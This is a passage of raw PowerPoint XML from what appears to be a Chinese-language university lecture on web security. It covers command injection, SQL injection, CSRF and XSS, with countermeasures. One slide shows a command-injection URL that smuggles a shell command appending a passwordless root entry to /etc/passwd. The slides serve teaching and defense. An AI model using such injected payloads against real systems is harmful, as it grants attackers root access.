              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="5410200"/>
            <a:ext cx="7064375" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  http://yourdomain.com/mail.php?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     email=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hacker@hackerhome.net&amp;subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     echo “evil::0:0:root:/:/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;&gt;/etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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39">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9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83076" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1283077" name="Rectangle 5" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Blueprint">
  <a:themeElements>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Blueprint">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triangle" w="lg"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triangle" w="lg"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4_Blueprint">
  <a:themeElements>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Blueprint">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triangle" w="lg"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triangle" w="lg"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Blueprint">
  <a:themeElements>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Blueprint">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triangle" w="lg"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triangle" w="lg"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Blueprint">
  <a:themeElements>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Blueprint">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triangle" w="lg"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triangle" w="lg"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61503</TotalTime>
  <Words>5385</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>600</Paragraphs>
  <Slides>77</Slides>
  <Notes>42</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="8" baseType="variant">
      <vt:variant>
        <vt:lpstr>已用的字体</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>14</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>主题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>4</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>嵌入 OLE 服务器</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>77</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="97" baseType="lpstr">
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>굴림</vt:lpstr>
      <vt:lpstr>MS PGothic</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Blueprint</vt:lpstr>
      <vt:lpstr>4_Blueprint</vt:lpstr>
      <vt:lpstr>1_Blueprint</vt:lpstr>
      <vt:lpstr>2_Blueprint</vt:lpstr>
      <vt:lpstr>Acrobat Document</vt:lpstr>
      <vt:lpstr>Image</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>三种最普遍的Web漏洞</vt:lpstr>
      <vt:lpstr>三种最普遍的web漏洞</vt:lpstr>
      <vt:lpstr>根本原因</vt:lpstr>
      <vt:lpstr>命令注入</vt:lpstr>
      <vt:lpstr>system()命令注入</vt:lpstr>
      <vt:lpstr>一般代码注入攻击</vt:lpstr>
      <vt:lpstr>使用system()的代码注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>使用PHP进行数据库查询</vt:lpstr>
      <vt:lpstr>SQL注入基本流程图</vt:lpstr>
      <vt:lpstr>SQL注入实例： CardSystems攻击</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>示例:  有bug的登陆页面 (ASP)</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>恶意的输入</vt:lpstr>
      <vt:lpstr>恶意的输入</vt:lpstr>
      <vt:lpstr>恶意的输入</vt:lpstr>
      <vt:lpstr>获取隐私信息</vt:lpstr>
      <vt:lpstr>结果</vt:lpstr>
      <vt:lpstr>防止SQL注入</vt:lpstr>
      <vt:lpstr>参数化/预处理SQL语句</vt:lpstr>
      <vt:lpstr>字符转义函数</vt:lpstr>
      <vt:lpstr>跨站请求伪造(CSRF/XSRF, Cross Site Request Forgery)</vt:lpstr>
      <vt:lpstr>Cookies + Sessions</vt:lpstr>
      <vt:lpstr>session利用cookies</vt:lpstr>
      <vt:lpstr>Cookies设置和发送</vt:lpstr>
      <vt:lpstr>Login Session</vt:lpstr>
      <vt:lpstr>跨站请求及其问题</vt:lpstr>
      <vt:lpstr>跨站请求及其问题</vt:lpstr>
      <vt:lpstr>CSRF基本流程图</vt:lpstr>
      <vt:lpstr>跨站请求伪造(CSRF)</vt:lpstr>
      <vt:lpstr>含有cookie的post表单</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>CSRF的根本原因</vt:lpstr>
      <vt:lpstr>对策: Referrer Header</vt:lpstr>
      <vt:lpstr>Referrer Header</vt:lpstr>
      <vt:lpstr>对策: Same-Site Cookies</vt:lpstr>
      <vt:lpstr>对策: Secret Token </vt:lpstr>
      <vt:lpstr>Secret Token</vt:lpstr>
      <vt:lpstr>Login CSRF</vt:lpstr>
      <vt:lpstr>Login CSRF</vt:lpstr>
      <vt:lpstr>Login CSRF</vt:lpstr>
      <vt:lpstr>Login CSRF--举例一</vt:lpstr>
      <vt:lpstr>Login CSRF</vt:lpstr>
      <vt:lpstr>Login CSRF</vt:lpstr>
      <vt:lpstr>Login CSRF--举例二</vt:lpstr>
      <vt:lpstr>Using Login CSRF for XSS</vt:lpstr>
      <vt:lpstr>Using Login CSRF for XSS</vt:lpstr>
      <vt:lpstr>跨站脚本(Cross Site Scripting, XSS)</vt:lpstr>
      <vt:lpstr>基本情景: 反射型XSS攻击</vt:lpstr>
      <vt:lpstr>XSS例子: 有漏洞的站点</vt:lpstr>
      <vt:lpstr>恶意的输入</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>什么是XSS?</vt:lpstr>
      <vt:lpstr>基本情景:反射型XSS</vt:lpstr>
      <vt:lpstr>            2006年的漏洞</vt:lpstr>
      <vt:lpstr>反射型XSS (Reflected XSS)</vt:lpstr>
      <vt:lpstr>反射型XSS攻击</vt:lpstr>
      <vt:lpstr>反射型XSS攻击</vt:lpstr>
      <vt:lpstr>存储型XSS (Stored XSS) </vt:lpstr>
      <vt:lpstr>存储型XSS攻击</vt:lpstr>
      <vt:lpstr>存储型XSS攻击</vt:lpstr>
      <vt:lpstr>MySpace.com   (Samy蠕虫)</vt:lpstr>
      <vt:lpstr>使用图片的存储型XSS</vt:lpstr>
      <vt:lpstr>XSS的危害</vt:lpstr>
      <vt:lpstr>自我传播的XSS 蠕虫</vt:lpstr>
      <vt:lpstr>自我传播的XSS 蠕虫</vt:lpstr>
      <vt:lpstr>自我传播的XSS 蠕虫：DOM方法</vt:lpstr>
      <vt:lpstr>自我传播的XSS 蠕虫</vt:lpstr>
      <vt:lpstr>自我传播的XSS 蠕虫</vt:lpstr>
      <vt:lpstr>自我传播的XSS 蠕虫: Link 方法</vt:lpstr>
      <vt:lpstr>对策: 过滤方法</vt:lpstr>
      <vt:lpstr>脚本不仅仅会在&lt;script&gt;的元素中</vt:lpstr>
      <vt:lpstr>对策: 编码方法</vt:lpstr>
      <vt:lpstr>讨论</vt:lpstr>
      <vt:lpstr>总结</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Stanford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第6讲 Web安全</dc:title>
  <dc:subject/>
  <dc:creator>Ante Derek</dc:creator>
  <cp:lastModifiedBy>j w</cp:lastModifiedBy>
  <cp:revision>7364</cp:revision>
  <cp:lastPrinted>1998-03-10T18:42:22Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1997-09-07T20:51:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-28T06:48:33Z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2</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Compression">
    <vt:i4>100</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="ScreenSize">
    <vt:i4>1</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="ScreenUsage">
    <vt:i4>1</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MailAddress">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="HomePage">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="Other">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="DownloadOriginal">
    <vt:bool>true</vt:bool>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="DownloadIEButton">
    <vt:bool>true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3</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="19" name="ShowNotes">
    <vt:bool>true</vt:bool>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="20" name="NavBtnPos">
    <vt:i4>3</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="21" name="OutputDir">
    <vt:lpwstr>C:\Documents\cs242\notes\web-slides</vt:lpwstr>
  </property>
</Properties>
</file>